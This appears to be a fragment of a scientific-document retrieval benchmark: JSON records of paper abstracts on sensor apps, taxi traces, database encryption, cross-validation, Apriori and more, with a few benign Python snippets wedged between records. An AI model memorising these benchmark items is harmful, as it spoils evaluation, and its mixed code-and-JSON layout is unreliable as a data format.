"text": "Today, sensors are increasingly used for data collection. In the medical domain, for example, vital signs (e.g., pulse or oxygen saturation) of patients can be measured with sensors and used for further processing. In this paper, different types of applications will be discussed whether sensors might be used in the context of these applications and their suitability for applying external sensors to them. Furthermore, a system architecture for adding sensor technology to respective applications is presented. For this purpose, a real-world business application scenario in the field of well-being and fitness is presented. In particular, we integrated two different sensors in our fitness application. We report on the lessons learned from the implementation and use of this application, e.g., in respect to connection and data structure. They mainly deal with problems relating to the connection and communication between the smart mobile device and the external sensors, as well as the selection of the appropriate type of application. Finally, a robust sensor framework, arising from this fitness application is presented. This framework provides basic features for connecting sensors. Particularly, in the medical domain, it is crucial to provide an easy to use toolset to relieve medical staff.",
"title": ""
},
{
"docid": "0c28741df3a9bf999f4abe7b840cfb26",
"text": "In this work, we analyze taxi-GPS traces collected in Lisbon, Portugal. We perform an exploratory analysis to visualize the spatiotemporal variation of taxi services; explore the relationships between pick-up and drop-off locations; and analyze the behavior in downtime (between the previous drop-off and the following pick-up). We also carry out the analysis of predictability of taxi trips for the next pick-up area type given history of taxi flow in time and space.",
"title": ""
},
{
"docid": "e8459c80dc392cac844b127bc5994a5d",
"text": "Database security has become a vital issue in modern Web applications. Critical business data in databases is an evident target for attack. Therefore, ensuring the confidentiality, privacy and integrity of data is a major issue for the security of database systems. Recent high profile data thefts have shown that perimeter defenses are insufficient to secure sensitive data. This paper studies security of the databases shared between many parties from a cryptographic perspective. We propose Mixed Cryptography Database (MCDB), a novel framework to encrypt databases over untrusted networks in a mixed form using many keys owned by different parties. The encryption process is based on a new data classification according to the data owner. The proposed framework is very useful in strengthening the protection of sensitive data even if the database server is attacked at multiple points from the inside or outside.",
"title": ""
},
{
"docid": "c1c241d9275e154a3fc2ca41a22b2c43",
"text": "Population counts and longitude and latitude coordinates were estimated for the 50 largest cities in the United States by computational linguistic techniques and by human participants. The mathematical technique Latent Semantic Analysis applied to newspaper texts produced similarity ratings between the 50 cities that allowed for a multidimensional scaling (MDS) of these cities. MDS coordinates correlated with the actual longitude and latitude of these cities, showing that cities that are located together share similar semantic contexts. This finding was replicated using a first-order co-occurrence algorithm. The computational estimates of geographical location as well as population were akin to human estimates. These findings show that language encodes geographical information that language users in turn may use in their understanding of language and the world.",
"title": ""
},
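A small sketch of the multidimensional scaling step described in the abstract above, assuming a precomputed city-by-city similarity matrix; the numbers are placeholders and the use of scikit-learn's MDS is an assumption for illustration, not the authors' implementation.

```python
import numpy as np
from sklearn.manifold import MDS

# sim[i, j]: LSA-style similarity between city i and city j (placeholder values)
sim = np.array([[1.0, 0.8, 0.2],
                [0.8, 1.0, 0.3],
                [0.2, 0.3, 1.0]])
dissim = 1.0 - sim                        # turn similarities into distances

mds = MDS(n_components=2, dissimilarity="precomputed", random_state=0)
coords = mds.fit_transform(dissim)        # 2-D layout to correlate with latitude/longitude
```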
{
"docid": "0e56ef5556c34274de7d7dceff17317e",
"text": "We investigate grounded sentence representations, where we train a sentence encoder to predict the image features of a given caption— i.e., we try to “imagine” how a sentence would be depicted visually—and use the resultant features as sentence representations. We examine the quality of the learned representations on a variety of standard sentence representation quality benchmarks, showing improved performance for groundedmodels over non-grounded ones. In addition, we thoroughly analyze the extent to which grounding contributes to improved performance, and show that the system also learns improved word embeddings.",
"title": ""
},
{
"docid": "4bab29f0689f301683370e73fa045bcc",
"text": "Over the past decade, the traditional purchasing and logistics functions have evolved into a broader strategic approach to materials and distribution management known as supply chain management. This research reviews the literature base and development of supply chain management from two separate paths that eventually merged into the modern era of a holistic and strategic approach to operations, materials and logistics management. In addition, this article attempts to clearly describe supply chain management since the literature is replete with buzzwords that address elements or stages of this new management philosophy. This article also discusses various supply chain management strategies and the conditions conducive to supply chain management. ( 2000 Elsevier Science Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a036dd162a23c5d24125d3270e22aaf7",
"text": "1 Problem Description This work is focused on the relationship between the news articles (breaking news) and stock prices. The student will design and develop methods to analyze how and when the news articles influence the stock market. News articles about Norwegian oil related companies and stock prices from \" BW Offshore Limited \" (BWO), \" DNO International \" (DNO), \" Frontline \" (FRO), \" Petroleum Geo-Services \" (PGS), \" Seadrill \" (SDRL), \" Sevan Marine \" (SEVAN), \" Siem Offshore \" (SIOFF), \" Statoil \" (STL) and \" TGS-NOPEC Geophysical Company \" (TGS) will be crawled, preprocessed and the important features in the text will be extracted to effectively represent the news in a form that allows the application of computational techniques. This data will then be used to train text sense classifiers. A prototype system that employs such classifiers will be developed to support the trader in taking sell/buy decisions. Methods will be developed for automaticall sense-labeling of news that are informed by the correlation between the changes in the stock prices and the breaking news. Performance of the prototype decision support system will be compared with a chosen baseline method for trade-related decision making. Abstract This thesis investigates the prediction of possible stock price changes immediately after news article publications. This is done by automatic analysis of these news articles. Some background information about financial trading theory and text mining is given in addition to an overview of earlier related research in the field of automatic news article analyzes with the purpose of predicting future stock prices. In this thesis a system is designed and implemented to predict stock price trends for the time immediately after the publication of news articles. This system consists mainly of four components. The first component gathers news articles and stock prices automatically from internet. The second component prepares the news articles by sending them to some document preprocessing steps and finding relevant features before they are sent to a document representation process. The third component categorizes the news articles into predefined categories, and finally the fourth component applies appropriate trading strategies depending on the category of the news article. This system requires a labeled data set to train the categorization component. This data set is labeled automatically on the basis of the price trends directly after the news article publication. An additional label refining step using clustering is added in an …",
"title": ""
},
{
"docid": "bd039cbb3b9640e917b9cc15e45e5536",
"text": "We introduce adversarial neural networks for representation learning as a novel approach to transfer learning in brain-computer interfaces (BCIs). The proposed approach aims to learn subject-invariant representations by simultaneously training a conditional variational autoencoder (cVAE) and an adversarial network. We use shallow convolutional architectures to realize the cVAE, and the learned encoder is transferred to extract subject-invariant features from unseen BCI users’ data for decoding. We demonstrate a proof-of-concept of our approach based on analyses of electroencephalographic (EEG) data recorded during a motor imagery BCI experiment.",
"title": ""
},
{
"docid": "9e10ca5f3776df0fe0ca41a8046adb27",
"text": "The availability of smartphone and wearable sensor technology is leading to a rapid accumulation of human subject data, and machine learning is emerging as a technique to map that data into clinical predictions. As machine learning algorithms are increasingly used to support clinical decision making, it is important to reliably quantify their prediction accuracy. Cross-validation is the standard approach for evaluating the accuracy of such algorithms; however, several cross-validations methods exist and only some of them are statistically meaningful. Here we compared two popular cross-validation methods: record-wise and subject-wise. Using both a publicly available dataset and a simulation, we found that record-wise cross-validation often massively overestimates the prediction accuracy of the algorithms. We also found that this erroneous method is used by almost half of the retrieved studies that used accelerometers, wearable sensors, or smartphones to predict clinical outcomes. As we move towards an era of machine learning based diagnosis and treatment, using proper methods to evaluate their accuracy is crucial, as erroneous results can mislead both clinicians and data scientists.",
"title": ""
},
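A brief illustration of the record-wise versus subject-wise distinction discussed in the abstract above, using standard scikit-learn splitters on synthetic data; the dataset itself is made up for the sketch.

```python
import numpy as np
from sklearn.model_selection import KFold, GroupKFold

rng = np.random.default_rng(0)
subjects = np.repeat(np.arange(10), 20)          # 10 subjects, 20 records each
X = rng.normal(size=(200, 5))
y = rng.integers(0, 2, size=200)

record_wise = KFold(n_splits=5, shuffle=True, random_state=0)   # mixes subjects across folds
subject_wise = GroupKFold(n_splits=5)                           # keeps each subject in one fold

# Subject-wise folds never share a subject between train and test,
# which is the property record-wise splitting silently violates.
for train, test in subject_wise.split(X, y, groups=subjects):
    assert set(subjects[train]).isdisjoint(subjects[test])
```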
{
"docid": "dd5e9984bbafb6b6aa8030e9a47c6230",
"text": "The variational Bayesian (VB) approximation is known to be a promising approach to Bayesian estimation, when the rigorous calculation of the Bayes posterior is intractable. The VB approximation has been successfully applied to matrix factorization (MF), offering automatic dimensionality selection for principal component analysis. Generally, finding the VB solution is a non-convex problem, and most methods rely on a local search algorithm derived through a standard procedure for the VB approximation. In this paper, we show that a better option is available for fully-observed VBMF—the global solution can be analytically computed. More specifically, the global solution is a reweighted SVD of the observed matrix, and each weight can be obtained by solving a quartic equation with its coefficients being functions of the observed singular value. We further show that the global optimal solution of empirical VBMF (where hyperparameters are also learned from data) can also be analytically computed. We illustrate the usefulness of our results through experiments in multi-variate analysis.",
"title": ""
},
{
"docid": "4b9d994288fc555c89554cc2c7e41712",
"text": "The authors have been developing humanoid robots in order to develop new mechanisms and functions for a humanoid robot that has the ability to communicate naturally with a human by expressing human-like emotion. In 2004, we developed the emotion expression humanoid robot WE-4RII (Waseda Eye No.4 Refined II) by integrating the new humanoid robot hands RCH-I (RoboCasa Hand No.1) into the emotion expression humanoid robot WE-4R. We confirmed that WE-4RII can effectively express its emotion.",
"title": ""
},
{
"docid": "c7cfc79579704027bf28fc7197496b8c",
"text": "There is a growing trend nowadays for patients to seek the least invasive treatments possible with less risk of complications and downtime to correct rhytides and ptosis characteristic of aging. Nonsurgical face and neck rejuvenation has been attempted with various types of interventions. Suture suspension of the face, although not a new idea, has gained prominence with the advent of the so called \"lunch-time\" face-lift. Although some have embraced this technique, many more express doubts about its safety and efficacy limiting its widespread adoption. The present review aims to evaluate several clinical parameters pertaining to thread suspensions such as longevity of results of various types of polypropylene barbed sutures, their clinical efficacy and safety, and the risk of serious adverse events associated with such sutures. Early results of barbed suture suspension remain inconclusive. Adverse events do occur though mostly minor, self-limited, and of short duration. Less clear are the data on the extent of the peak correction and the longevity of effect, and the long-term effects of the sutures themselves. The popularity of barbed suture lifting has waned for the time being. Certainly, it should not be presented as an alternative to a face-lift.",
"title": ""
},
{
"docid": "72600a23cc70d9cc3641cbfc7f23ba4d",
"text": "Primary cicatricial alopecias (PCAs) are a rare, but important, group of disorders that cause irreversible damage to hair follicles resulting in scarring and permanent hair loss. They may also signify an underlying systemic disease. Thus, it is of paramount importance that clinicians who manage patients with hair loss are able to diagnose these disorders accurately. Unfortunately, PCAs are notoriously difficult conditions to diagnose and treat. The aim of this review is to present a rational and pragmatic guide to help clinicians in the professional assessment, investigation and diagnosis of patients with PCA. Illustrating typical clinical and histopathological presentations of key PCA entities we show how dermatoscopy can be profitably used for clinical diagnosis. Further, we advocate the search for loss of follicular ostia as a clinical hallmark of PCA, and suggest pragmatic strategies that allow rapid formulation of a working diagnosis.",
"title": ""
},
{
"docid": "bcbbc8913330378af7c986549ab4bb30",
"text": "Anomaly detection involves identifying the events which do not conform to an expected pattern in data. A common approach to anomaly detection is to identify outliers in a latent space learned from data. For instance, PCA has been successfully used for anomaly detection. Variational autoencoder (VAE) is a recently-developed deep generative model which has established itself as a powerful method for learning representation from data in a nonlinear way. However, the VAE does not take the temporal dependence in data into account, so it limits its applicability to time series. In this paper we combine the echo-state network, which is a simple training method for recurrent networks, with the VAE, in order to learn representation from multivariate time series data. We present an echo-state conditional variational autoencoder (ES-CVAE) and demonstrate its useful behavior in the task of anomaly detection in multivariate time series data.",
"title": ""
},
{
"docid": "4ecd27822fee036150b1c8f3db70c679",
"text": "Despite the proliferation of e-services, they are still characterized by uncertainties. As result, consumer trust beliefs are considered an important determinant of e-service adoption. Past work has not however considered the potentially dynamic nature of these trust beliefs, and how early-stage trust might influence later-stage adoption and use. To address this gap, this study draws on the theory of reasoned action and expectation-confirmation theory to carry out a longitudinal study of trust in eservices. Specifically, we examine how trust interacts with other consumer beliefs, such as perceived usefulness, and how together these beliefs influence consumer intentions and actual behaviours toward e-services at both initial and later stages of use. The empirical context is online health information services. Data collection was carried out at two time periods, approximately 7 weeks apart using a student population. The results show that perceived usefulness and trust are important at both initial and later stages in consumer acceptance of online health services. Consumers’ actual usage experiences modify perceptions of usefulness and influence the confirmation of their initial expectations. These results have implications for our understanding of the dynamic nature of trust and perceived usefulness, and their roles in long term success of e-services.",
"title": ""
},
{
"docid": "4c4a28724bf847de8e57765f869c4f3f",
"text": "Emotional sensitivity, emotion regulation and impulsivity are fundamental topics in research of borderline personality disorder (BPD). Studies using fMRI examining the neural correlates concerning these topics is growing and has just begun understanding the underlying neural correlates in BPD. However, there are strong similarities but also important differences in results of different studies. It is therefore important to know in more detail what these differences are and how we should interpret these. In present review a critical light is shed on the fMRI studies examining emotional sensitivity, emotion regulation and impulsivity in BPD patients. First an outline of the methodology and the results of the studies will be given. Thereafter important issues that remained unanswered and topics to improve future research are discussed. Future research should take into account the limited power of previous studies and focus more on BPD specificity with regard to time course responses, different regulation strategies, manipulation of self-regulation, medication use, a wider range of stimuli, gender effects and the inclusion of a clinical control group.",
"title": ""
},
{
"docid": "9f52ee95148490555c10f699678b640d",
"text": "Prior research indicates that Facebook usage predicts declines in subjective well-being over time. How does this come about? We examined this issue in 2 studies using experimental and field methods. In Study 1, cueing people in the laboratory to use Facebook passively (rather than actively) led to declines in affective well-being over time. Study 2 replicated these findings in the field using experience-sampling techniques. It also demonstrated how passive Facebook usage leads to declines in affective well-being: by increasing envy. Critically, the relationship between passive Facebook usage and changes in affective well-being remained significant when controlling for active Facebook use, non-Facebook online social network usage, and direct social interactions, highlighting the specificity of this result. These findings demonstrate that passive Facebook usage undermines affective well-being.",
"title": ""
},
{
"docid": "a64ae2e6e72b9e38c700ddd62b4f6bf3",
"text": "Cerebral gray-matter volume (GMV) decreases in normal aging but the extent of the decrease may be experience-dependent. Bilingualism may be one protective factor and in this article we examine its potential protective effect on GMV in a region that shows strong age-related decreases-the left anterior temporal pole. This region is held to function as a conceptual hub and might be expected to be a target of plastic changes in bilingual speakers because of the requirement for these speakers to store and differentiate lexical concepts in 2 languages to guide speech production and comprehension processes. In a whole brain comparison of bilingual speakers (n = 23) and monolingual speakers (n = 23), regressing out confounding factors, we find more extensive age-related decreases in GMV in the monolingual brain and significantly increased GMV in left temporal pole for bilingual speakers. Consistent with a specific neuroprotective effect of bilingualism, region of interest analyses showed a significant positive correlation between naming performance in the second language and GMV in this region. The effect appears to be bilateral though because there was a nonsignificantly different effect of naming performance on GMV in the right temporal pole. Our data emphasize the vulnerability of the temporal pole to normal aging and the value of bilingualism as both a general and specific protective factor to GMV decreases in healthy aging.",
"title": ""
}
] | scidocsrr |
82199b11d2d9b2dba4dd628ee36af561 | Views: A Way for Pattern Matching to Cohabit with Data Abstraction | [
{
"docid": "7c8f667a1a1d683de699f6523efadd28",
"text": "Introduction Pattern matching is a very powerful and useful device in programming. In functional languages it emerged in SASL [Turn76] and Hope [BursS0], and has also found its way into SML [Miln84]. The pattern mathing described here is that of LML which is a lazy ([Frie76] and [Henri76]) variant of ML. The pattern matching in LML evolved independently of that in SML so they are not (yet) the same, although very similar. The compilation of pattern matching in SML has been addressed in [Card84]. The LML compiler project began as an attempt to produce efficient code for a typed functional language with lazy evaluation. Since we regard pattern matching as an important language feature it should also yield efficient code. Only pattern matching in case expressions is described here, since we regard this as the basic pattern matching facility in the language. All other types of pattern mathing used in LML can be easily translated into case expressions, see [Augu84] for details. The compilation (of pattern matching) proceeds in several steps: • transform all pattern matching to case expressions. • transform complex case expressions into expressions that are easy to generate code for. • generate G-code for the case expressions, and from that machine code for the target machine.",
"title": ""
}
] | [
{
"docid": "376943ca96470be14dd8ee821a59e0ee",
"text": "Interoperability in the Internet of Things is critical for emerging services and applications. In this paper we advocate the use of IoT `hubs' to aggregate things using web protocols, and suggest a staged approach to interoperability. In the context of a UK government funded project involving 8 IoT sub-projects to address cross-domain IoT interoperability, we introduce the HyperCat IoT catalogue specification. We then describe the tools and techniques we developed to adapt an existing data portal and IoT platform to this specification, and provide an IoT hub focused on the highways industry called `Smart Streets'. Based on our experience developing this large scale IoT hub, we outline lessons learned which we hope will contribute to ongoing efforts to create an interoperable global IoT ecosystem.",
"title": ""
},
{
"docid": "04013595912b4176574fb81b38beade5",
"text": "This chapter presents an overview of the current state of cognitive task analysis (CTA) in research and practice. CTA uses a variety of interview and observation strategies to capture a description of the explicit and implicit knowledge that experts use to perform complex tasks. The captured knowledge is most often transferred to training or the development of expert systems. The first section presents descriptions of a variety of CTA techniques, their common characteristics, and the typical strategies used to elicit knowledge from experts and other sources. The second section describes research on the impact of CTA and synthesizes a number of studies and reviews pertinent to issues underlying knowledge elicitation. In the third section, we discuss the integration of CTA with training design. Finally, in the fourth section, we present a number of recommendations for future research and conclude with general comments.",
"title": ""
},
{
"docid": "7f43ad2fd344aa7260e3af33d3f69e32",
"text": "Charge pump circuits are used for obtaining higher voltages than normal power supply voltage in flash memories, DRAMs and low voltage designs. In this paper, we present a charge pump circuit in standard CMOS technology that is suited for low voltage operation. Our proposed charge pump uses a cross- connected NMOS cell as the basic element and PMOS switches are employed to connect one stage to the next. The simulated output voltages of the proposed 4 stage charge pump for input voltage of 0.9 V, 1.2 V, 1.5 V, 1.8 V and 2.1 V are 3.9 V, 5.1 V, 6.35 V, 7.51 V and 8.4 V respectively. This proposed charge pump is suitable for low power CMOS mixed-mode designs.",
"title": ""
},
{
"docid": "5f7692030a6ebfe64a89a37835ea3571",
"text": "Social networking sites are a substantial part of adolescents' daily lives. By using a longitudinal approach the current study examined the impact of (a) positive self-presentation, (b) number of friends, and (c) the initiation of online relationships on Facebook on adolescents' self-esteem and their initiation of offline relationships, as well as the mediating role of positive feedback. Questionnaire data were obtained from 217 adolescents (68% girls, mean age 16.7 years) in two waves. Adolescents' positive self-presentation and number of friends were found to be related to a higher frequency of receiving positive feedback, which in turn was negatively associated with self-esteem. However, the number of Facebook friends had a positive impact on self-esteem, and the initiation of online relationships positively influenced the initiation of offline relationships over time, demonstrating that Facebook may be a training ground for increasing adolescents' social skills. Implications and suggestions for future research are provided.",
"title": ""
},
{
"docid": "c9dca9b27abe9ebabeff7c7e3814dcae",
"text": "The Internet of Things (IoT) can be defined as an environment where internet capabilities are applied to everyday objects that have earlier not been considered as computers to provide a network connectivity that will enable these objects to generate, exchange and consume data. According to a forecast given by the Ericsson Mobility report issued in June 2016, there will be as many as 16 billion connected devices that will get Internet of Things (IoT) technology-enabled by 2021. Apart from having its uses in personal well-being and comfort, IoT will be a key factor in the planning of smart cities specially in the time when governments are focussed on the development of smart cities. This technology can be implemented not just for communication networks but also for sanitation, transportation, healthcare, energy use and much more.",
"title": ""
},
{
"docid": "1e9e64a89947c08f8ce298d7e0de4183",
"text": "This paper proposes a novel architecture for plug-in electric vehicles (PEVs) dc charging station at the megawatt level, through the use of a grid-tied neutral point clamped (NPC) converter. The proposed bipolar dc structure reduces the step-down effort on the dc-dc fast chargers. In addition, this paper proposes a balancing mechanism that allows handling any difference on the dc loads while keeping the midpoint voltage accurately regulated. By formally defining the unbalance operation limit, the proposed control scheme is able to provide complementary balancing capabilities by the use of an additional NPC leg acting as a bidirectional dc-dc stage, simulating the minimal load condition and allowing the modulator to keep the control on the dc voltages under any load scenario. The proposed solution enables fast charging for PEVs concentrating several charging units into a central grid-tied converter. In this paper, simulation and experimental results are presented to validate the proposed charging station architecture.",
"title": ""
},
{
"docid": "4f3936b753abd2265d867c0937aec24c",
"text": "A weighted constraint satisfaction problem (WCSP) is a constraint satisfaction problem in which preferences among solutions can be expressed. Bucket elimination is a complete technique commonly used to solve this kind of constraint satisfaction problem. When the memory required to apply bucket elimination is too high, a heuristic method based on it (denominated mini-buckets) can be used to calculate bounds for the optimal solution. Nevertheless, the curse of dimensionality makes these techniques impractical on large scale problems. In response to this situation, we present a memetic algorithm for WCSPs in which bucket elimination is used as a mechanism for recombining solutions, providing the best possible child from the parental set. Subsequently, a multi-level model in which this exact/metaheuristic hybrid is further hybridized with branch-and-bound techniques and mini-buckets is studied. As a case study, we have applied these algorithms to the resolution of the maximum density still life problem, a hard constraint optimization problem based on Conway’s game of life. The resulting algorithm consistently finds optimal patterns for up to date solved instances in less time than current approaches. Moreover, it is shown that this proposal provides new best known solutions for very large instances.",
"title": ""
},
{
"docid": "ae7347af720ab76ab098a62b3236c17c",
"text": "We propose discriminative adversarial networks (DAN) for semi-supervised learning and loss function learning. Our DAN approach builds upon generative adversarial networks (GANs) and conditional GANs but includes the key differentiator of using two discriminators instead of a generator and a discriminator. DAN can be seen as a framework to learn loss functions for predictors that also implements semi-supervised learning in a straightforward manner. We propose instantiations of DAN for two different prediction tasks: classification and ranking. Our experimental results on three datasets of different tasks demonstrate that DAN is a promising framework for both semi-supervised learning and learning loss functions for predictors. For all tasks, the semi-supervised capability of DAN can significantly boost the predictor performance for small labeled sets with minor architecture changes across tasks. Moreover, the loss functions automatically learned by DANs are very competitive and usually outperform the standard pairwise and negative log-likelihood loss functions for semi-supervised learning.",
"title": ""
},
{
"docid": "e143eb298fff97f8f58cc52caa945640",
"text": "Supervised domain adaptation—where a large generic corpus and a smaller indomain corpus are both available for training—is a challenge for neural machine translation (NMT). Standard practice is to train a generic model and use it to initialize a second model, then continue training the second model on in-domain data to produce an in-domain model. We add an auxiliary term to the training objective during continued training that minimizes the cross entropy between the indomain model’s output word distribution and that of the out-of-domain model to prevent the model’s output from differing too much from the original out-ofdomain model. We perform experiments on EMEA (descriptions of medicines) and TED (rehearsed presentations), initialized from a general domain (WMT) model. Our method shows improvements over standard continued training by up to 1.5 BLEU.",
"title": ""
},
{
"docid": "3ee6ad4099e8fe99042472207e6dac09",
"text": "The millimeter-wave (mmWave) band offers the potential for high-bandwidth communication channels in cellular networks. It is not clear, however, whether both high data rates and coverage in terms of signal-to-noise-plus-interference ratio can be achieved in interference-limited mmWave cellular networks due to the differences in propagation conditions and antenna topologies. This article shows that dense mmWave networks can achieve both higher data rates and comparable coverage relative to conventional microwave networks. Sum rate gains can be achieved using more advanced beamforming techniques that allow multiuser transmission. The insights are derived using a new theoretical network model that incorporates key characteristics of mmWave networks.",
"title": ""
},
{
"docid": "bd110cfe3a3dbb31057fec06e6a5e8d9",
"text": "In this study, it proposes a new optimization algorithm called APRIORI-IMPROVE based on the insufficient of Apriori. APRIORI-IMPROVE algorithm presents optimizations on 2-items generation, transactions compression and so on. APRIORI-IMPROVE uses hash structure to generate L2, uses an efficient horizontal data representation and optimized strategy of storage to save time and space. The performance study shows that APRIORI-IMPROVE is much faster than Apriori.",
"title": ""
},
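A rough sketch of the hash-based counting of candidate 2-itemsets that the abstract above attributes to APRIORI-IMPROVE; the bucketing details are an assumption for illustration, not the paper's exact design.

```python
from collections import defaultdict
from itertools import combinations

def frequent_pairs(transactions, min_support):
    """Count candidate 2-itemsets in one pass via a hash table."""
    buckets = defaultdict(int)
    for t in transactions:
        for pair in combinations(sorted(set(t)), 2):
            buckets[pair] += 1
    return {p: c for p, c in buckets.items() if c >= min_support}

txns = [["a", "b", "c"], ["a", "b"], ["b", "c"], ["a", "c"]]
print(frequent_pairs(txns, min_support=2))
# {('a', 'b'): 2, ('a', 'c'): 2, ('b', 'c'): 2}
```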
{
"docid": "2c37ee67205320d54149a71be104c0e1",
"text": "This talk will review the mission, activities, and recommendations of the Blue Ribbon Panel on Cyberinfrastructure recently appointed by the leadership on the U.S. National Science Foundation (NSF). The NSF invests in people, ideas, and tools and in particular is a major investor in basic research to produce communication and information technology (ICT) as well as its use in supporting basic research and education in most all areas of science and engineering. The NSF through its Directorate for Computer and Information Science and Engineering (CISE) has provided substantial funding for high-end computing resources, initially by awards to five supercomputer centers and later through $70 M per year investments in two partnership alliances for advanced computation infrastructures centered at the University of Illinois and the University of California, San Diego. It has also invested in an array of complementary R&D initiatives in networking, middleware, digital libraries, collaboratories, computational and visualization science, and distributed terascale grid environments.",
"title": ""
},
{
"docid": "b3ced0cf4520f44bc1fd745ae439bcf6",
"text": "This paper describes the basic principles of traditional 2D hand drawn animation and their application to 3D computer animation. After describing how these principles evolved, the individual principles are detailed, addressing their meanings in 2D hand drawn animation and their application to 3D computer animation. This should demonstrate the importance of these principles to quality 3D computer animation.",
"title": ""
},
{
"docid": "4fec66381a581c310921be16077e049e",
"text": "Saliva is increasingly recognised as an attractive diagnostic fluid. The presence of various disease signalling salivary biomarkers that accurately reflect normal and disease states in humans and the sampling benefits compared to blood sampling are some of the reasons for this recognition. This explains the burgeoning research field in assay developments and technological advancements for the detection of various salivary biomarkers to improve clinical diagnosis, management, and treatment. This paper reviews the significance of salivary biomarkers for clinical diagnosis and therapeutic applications, with focus on the technologies and biosensing platforms that have been reported for screening these biomarkers.",
"title": ""
},
{
"docid": "50ebb1feb21be692aaddb6ca74170c49",
"text": "We show that a character-level encoderdecoder framework can be successfully applied to question answering with a structured knowledge base. We use our model for singlerelation question answering and demonstrate the effectiveness of our approach on the SimpleQuestions dataset (Bordes et al., 2015), where we improve state-of-the-art accuracy from 63.9% to 70.9%, without use of ensembles. Importantly, our character-level model has 16x fewer parameters than an equivalent word-level model, can be learned with significantly less data compared to previous work, which relies on data augmentation, and is robust to new entities in testing. 1",
"title": ""
},
{
"docid": "2421518a0646cb76d2aac6c33ccd06dc",
"text": "Modern technologies enable us to record sequences of online user activity at an unprecedented scale. Although such activity logs are abundantly available, most approaches to recommender systems are based on the rating-prediction paradigm, ignoring temporal and contextual aspects of user behavior revealed by temporal, recurrent patterns. In contrast to explicit ratings, such activity logs can be collected in a non-intrusive way and can offer richer insights into the dynamics of user preferences, which could potentially lead more accurate user models. In this work we advocate studying this ubiquitous form of data and, by combining ideas from latent factor models for collaborative filtering and language modeling, propose a novel, flexible and expressive collaborative sequence model based on recurrent neural networks. The model is designed to capture a user’s contextual state as a personalized hidden vector by summarizing cues from a data-driven, thus variable, number of past time steps, and represents items by a real-valued embedding. We found that, by exploiting the inherent structure in the data, our formulation leads to an efficient and practical method. Furthermore, we demonstrate the versatility of our model by applying it to two different tasks: music recommendation and mobility prediction, and we show empirically that our model consistently outperforms static and non-collaborative methods.",
"title": ""
},
{
"docid": "e67f95384ce816124648cdc33cd7091c",
"text": "A high-efficiency push-pull power amplifier has been designed and measured across a bandwidth of 250MHz to 3.1GHz. The output power was 46dBm with a drain efficiency of above 45% between 700MHz and 2GHz, with a minimum output power of 43dBm across the entire band. In addition, a minimum of 60% drain efficiency and 11dB transducer gain was measured between 350MHz and 1GHz. The design was realized using a coaxial cable transmission line balun, which provides a broadband 2∶1 impedance transformation ratio and reduces the need for bandwidth-limiting conventional matching. The combination of output power, bandwidth and efficiency are believed to be the best reported to date at these frequencies.",
"title": ""
},
{
"docid": "b82f7b7a317715ba0c7ca87db92c7bf6",
"text": "Regions of hypoxia in tumours can be modelled in vitro in 2D cell cultures with a hypoxic chamber or incubator in which oxygen levels can be regulated. Although this system is useful in many respects, it disregards the additional physiological gradients of the hypoxic microenvironment, which result in reduced nutrients and more acidic pH. Another approach to hypoxia modelling is to use three-dimensional spheroid cultures. In spheroids, the physiological gradients of the hypoxic tumour microenvironment can be inexpensively modelled and explored. In addition, spheroids offer the advantage of more representative modelling of tumour therapy responses compared with 2D culture. Here, we review the use of spheroids in hypoxia tumour biology research and highlight the different methodologies for spheroid formation and how to obtain uniformity. We explore the challenge of spheroid analyses and how to determine the effect on the hypoxic versus normoxic components of spheroids. We discuss the use of high-throughput analyses in hypoxia screening of spheroids. Furthermore, we examine the use of mathematical modelling of spheroids to understand more fully the hypoxic tumour microenvironment.",
"title": ""
},
{
"docid": "269a1feea406f1c7c21793c69458b7ec",
"text": "In this paper, we investigate the following question:whenperformingnext best viewselection for volumetric 3D reconstruction of an object by a mobile robot equipped with a dense (camera-based) depth sensor, what formulation of information gain is best? To address this question, we propose several new ways to quantify the volumetric information (VI) contained in the voxels of a probabilistic volumetric map, and compare them to the state of the art with extensive simulated experiments. Our proposed formulations incorporate factors such as visibility likelihood and the likelihood of seeing new parts of the object. The results of our experiments allow us to draw some clear conclusions about the VI formulations that are most effective in different mobile-robot reconstruction scenarios. To the best of our knowledge, this is the first comparative survey of VI formulation performance for active 3D object reconstruction. Additionally, our modular software framework is adaptable to other robotic platforms and general reconstruction problems, and we release it open source for autonomous reconstruction tasks.",
"title": ""
}
] | scidocsrr |
3ac18e86840280b45db50d118f06b177 | Music Retrieval and Recommendation: A Tutorial Overview | [
{
"docid": "a8d7f6dcaf55ebd5ec580b2b4d104dd9",
"text": "In this paper we investigate social tags as a novel highvolume source of semantic metadata for music, using techniques from the fields of information retrieval and multivariate data analysis. We show that, despite the ad hoc and informal language of tagging, tags define a low-dimensional semantic space that is extremely well-behaved at the track level, in particular being highly organised by artist and musical genre. We introduce the use of Correspondence Analysis to visualise this semantic space, and show how it can be applied to create a browse-by-mood interface for a psychologically-motivated two-dimensional subspace rep resenting musical emotion.",
"title": ""
}
] | [
{
"docid": "204f7f8282954de4d6b725f5cce0b00f",
"text": "Traffic classification plays an important and basic role in network management and cyberspace security. With the widespread use of encryption techniques in network applications, encrypted traffic has recently become a great challenge for the traditional traffic classification methods. In this paper we proposed an end-to-end encrypted traffic classification method with one-dimensional convolution neural networks. This method integrates feature extraction, feature selection and classifier into a unified end-to-end framework, intending to automatically learning nonlinear relationship between raw input and expected output. To the best of our knowledge, it is the first time to apply an end-to-end method to the encrypted traffic classification domain. The method is validated with the public ISCX VPN-nonVPN traffic dataset. Among all of the four experiments, with the best traffic representation and the fine-tuned model, 11 of 12 evaluation metrics of the experiment results outperform the state-of-the-art method, which indicates the effectiveness of the proposed method.",
"title": ""
},
{
"docid": "e7a22474a051cfd64e64e393d87ff1c9",
"text": "Sequence alignment is an important problem in computational biology. We compare two different approaches to the problem of optimally aligning two or more character strings: bounded dynamic programming (BDP), and divide-and-conquer frontier search (DCFS). The approaches are compared in terms of time and space requirements in 2 through 5 dimensions with sequences of varying similarity and length. While BDP performs better in two and three dimensions, it consumes more time and memory than DCFS for higher-dimensional problems.",
"title": ""
},
{
"docid": "f1fa70e4e39b727be7a1f8f87a45a935",
"text": "We investigate electronic transport properties of the squashed armchair carbon nanotubes, using tight-binding molecular dynamics and the Green's function method. We demonstrate a metal-to-semiconductor transition while squashing the nanotubes and a general mechanism for such a transition. It is the distinction of the two sublattices in the nanotube that opens an energy gap near the Fermi energy. We show that the transition has to be achieved by a combined effect of breaking of mirror symmetry and bond formation between the flattened faces in the squashed nanotubes.",
"title": ""
},
{
"docid": "89c76729f6d1e53b35ecce548c5955af",
